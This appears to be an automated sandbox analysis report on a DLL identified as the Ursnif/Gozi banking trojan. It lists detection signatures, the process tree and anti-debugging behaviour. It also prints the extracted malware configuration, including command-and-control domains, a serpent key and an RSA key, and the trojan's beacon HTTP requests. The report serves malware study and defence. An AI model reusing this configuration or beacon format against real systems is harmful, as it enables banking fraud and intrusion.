Windows Analysis Report 616412739e268.dll

Overview

General Information

Sample Name: 616412739e268.dll
Analysis ID: 500413
MD5: 9e67e68ddbedba865b91b5469ab642ef
SHA1: f2c7b0735343081be06e48616d0fc14235a28744
SHA256: 41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
Tags: brt, dll, gozi, isfb, ursnif

Detection

Ursnif
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7088 cmdline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5724 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4432 cmdline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6084 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6012 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4360 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
2.2.loaddll32.exe.2d494a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
10.3.rundll32.exe.10ba31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.3.rundll32.exe.10da31a.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.3.rundll32.exe.318a31a.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
6.2.rundll32.exe.6e8d0000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 616412739e268.dll, ReversingLabs: Detection: 24%
Source: 616412739e268.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: unknown, HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49782 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49783 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49821 version: TLS 1.2
Source: 616412739e268.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000002.00000002.682655563.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.683978405.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.548616295.000000006E94B000.00000002.00020000.sdmp, 616412739e268.dll

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 40.97.161.50 187
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 52.98.207.210 187
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 40.101.60.226 187
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe, Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 13.82.28.61 187
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View, IP Address: 40.97.161.50
Source: Joe Sandbox View, IP Address: 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBXvAEYkPgeGA_/2By9PpRoLgfve_2F/vhfdT7HCV506AwB/36mBvSW_2FRJGuHNuA/yE6OJX0fi/uPoeQfh7fRd0REpiPmsf/t9myfegLaxJw_2B8ay_/2FKKbEnJu_2BUYEu1pJNUs/ydzaPjLRj/fW1.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7CtgIlmwdVETSdZ_2B/b8UUaR4yA5m9yE7vka1/Gh0JtvuATrVobNbwlsuYfN/IReexc6mib3Oj/OUfheoEg/Oot_2BsNxyrozYIcd4Px1xV/TZHusM6SVs/2zs_2FZfacHwT9roF/sfywcfJ4/Yw.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Fr_2B9CI4wQ8pfr/Ae2iDA4fgxuX_2F/EFvlU1RKcf_2BhblV1/R4qA8rb50/6GzaaVaZ467uvOz0B0BG/K6jq9ZPGaLm0dRA_2Bj/N_2Bpix6pkAKp3MF04Fjk4/gUVThkiIQADOb/DN4NS4MK/cUs7VKKK39GCKuME9SOTcIm/_2FCC2gu/C.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwM/OT0v9gJP/37ksb0fn_2FMie_2BYo4csJ/dqKZMmwVVY/NW0eW6kdSEZXJYqwn/QNXYETIahUBU/o58GZV2YU8a/BbpCAOptavmy35/f7j8F4VRrMxGtvE_2FpUR/raE_2Bxf0kZoKM1o/ZbBDSIO0tnuHu4l/cpfED0PavpBMJm1ykA/Lck.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: f95b0919-28f4-47a7-648d-aec4a884b896Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB6PR07CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB6PR07CA0023.EURPRD07.PROD.OUTLOOK.COMX-CalculatedBETarget: DB7P194MB0474.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: GQlb+fQop0dkja7EqIS4lg.1.1X-FEServer: DB6PR07CA0023X-Powered-By: ASP.NETX-FEServer: AM5P194CA0003Date: Mon, 11 Oct 2021 22:51:28 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 7ba0ffc6-f8f8-51ea-5952-b8c598033637Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: PR3P195CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: PR3P195CA0027.EURP195.PROD.OUTLOOK.COMX-CalculatedBETarget: PR3P194MB0683.EURP194.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: xv+ge/j46lFZUrjFmAM2Nw.1.1X-FEServer: PR3P195CA0027X-Powered-By: ASP.NETX-FEServer: AM5P194CA0015Date: Mon, 11 Oct 2021 22:51:42 GMTConnection: close
                      Source: unknown DNS traffic detected: queries for: msn.com
                      Source: unknown HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49759 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49766 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49779 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49782 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49783 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.3:49816 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 52.98.207.210:443 -> 192.168.2.3:49820 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49821 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Yara detected Ursnif
                      Source: loaddll32.exe, 00000002.00000002.677754836.0000000000C1B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      Yara detected Ursnif

                      System Summary:

                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 616412739e268.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 880
                      Source: C:\Windows\System32\loaddll32.exe, Code function: String function: 6E90ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6E90AEC0 appears 36 times
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6E90ABD1 appears 182 times
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6E918487 appears 34 times
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 2_2_6E8D13B8 GetProcAddress,NtCreateSection,memset
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 2_2_6E8D15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 2_2_6E8D1273 NtMapViewOfSection
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 2_2_6E8D23D5 NtQueryVirtualMemory
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 2_2_00A35D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 2_2_00A3B149 NtQueryVirtualMemory
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_031A5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_031AB149 NtQueryVirtualMemory
                      Source: 616412739e268.dll, ReversingLabs: Detection: 24%
                      Source: 616412739e268.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6012 -s 628
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848
                      Source: C:\Windows\System32\loaddll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER923.tmp
                      Source: classification engine, Classification label: mal88.troj.evad.winDLL@14/12@15/5
                      Source: C:\Windows\System32\loaddll32.exe, Code function: 2_2_00A34A03 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
                      Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6084
                      Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6012
                      Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4360
                      Source: C:\Windows\System32\loaddll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe, File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe, File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe, Automated click: OK
                      Source: 616412739e268.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 616412739e268.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000002.00000002.682655563.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.683978405.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.548616295.000000006E94B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: msctf.pdb"{M@C source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D21A3 push ecx; ret 2_2_6E8D21B3
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D2150 push ecx; ret 2_2_6E8D2159
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3EC72 push D5DD2AEAh; iretd 2_2_00A3ECD6
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3ABE0 push ecx; ret 2_2_00A3ABE9
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3AF13 push ecx; ret 2_2_00A3AF23
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E90AB9A push ecx; ret 2_2_6E90ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031AAF13 push ecx; ret 6_2_031AAF23
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031AABE0 push ecx; ret 6_2_031AABE9
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031AEC72 push D5DD2AEAh; iretd 6_2_031AECD6
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E90AB9A push ecx; ret 6_2_6E90ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E90AB9A push ecx; ret 9_2_6E90ABAD
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D1DE5 LoadLibraryA,GetProcAddress, 2_2_6E8D1DE5

                      Hooking and other Techniques for Hiding and Protection:

                      Yara detected Ursnif
                      Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 00000018.00000002.553524158.0000000004891000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWP
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmp, WerFault.exe, 00000012.00000002.531474027.0000000005282000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.541015107.0000000004C87000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.549834890.00000000047C4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWen-USn7
                      Source: WerFault.exe, 00000012.00000002.531217612.0000000005260000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWH
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E916CB3
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D1DE5 LoadLibraryA,GetProcAddress, 2_2_6E8D1DE5
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E92C325 mov eax, dword ptr fs:[00000030h] 2_2_6E92C325
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E938861 mov eax, dword ptr fs:[00000030h] 2_2_6E938861
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E97DFDA mov eax, dword ptr fs:[00000030h] 2_2_6E97DFDA
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E97DEAA mov eax, dword ptr fs:[00000030h] 2_2_6E97DEAA
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E97DBB5 push dword ptr fs:[00000030h] 2_2_6E97DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E92C325 mov eax, dword ptr fs:[00000030h] 6_2_6E92C325
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E938861 mov eax, dword ptr fs:[00000030h] 6_2_6E938861
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E97DFDA mov eax, dword ptr fs:[00000030h] 6_2_6E97DFDA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E97DEAA mov eax, dword ptr fs:[00000030h] 6_2_6E97DEAA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E97DBB5 push dword ptr fs:[00000030h] 6_2_6E97DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E92C325 mov eax, dword ptr fs:[00000030h] 9_2_6E92C325
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E938861 mov eax, dword ptr fs:[00000030h] 9_2_6E938861
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E97DFDA mov eax, dword ptr fs:[00000030h] 9_2_6E97DFDA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E97DEAA mov eax, dword ptr fs:[00000030h] 9_2_6E97DEAA
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E97DBB5 push dword ptr fs:[00000030h] 9_2_6E97DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_6E916CB3
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6E90B316
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6E916CB3
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6E90B316
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_6E916CB3
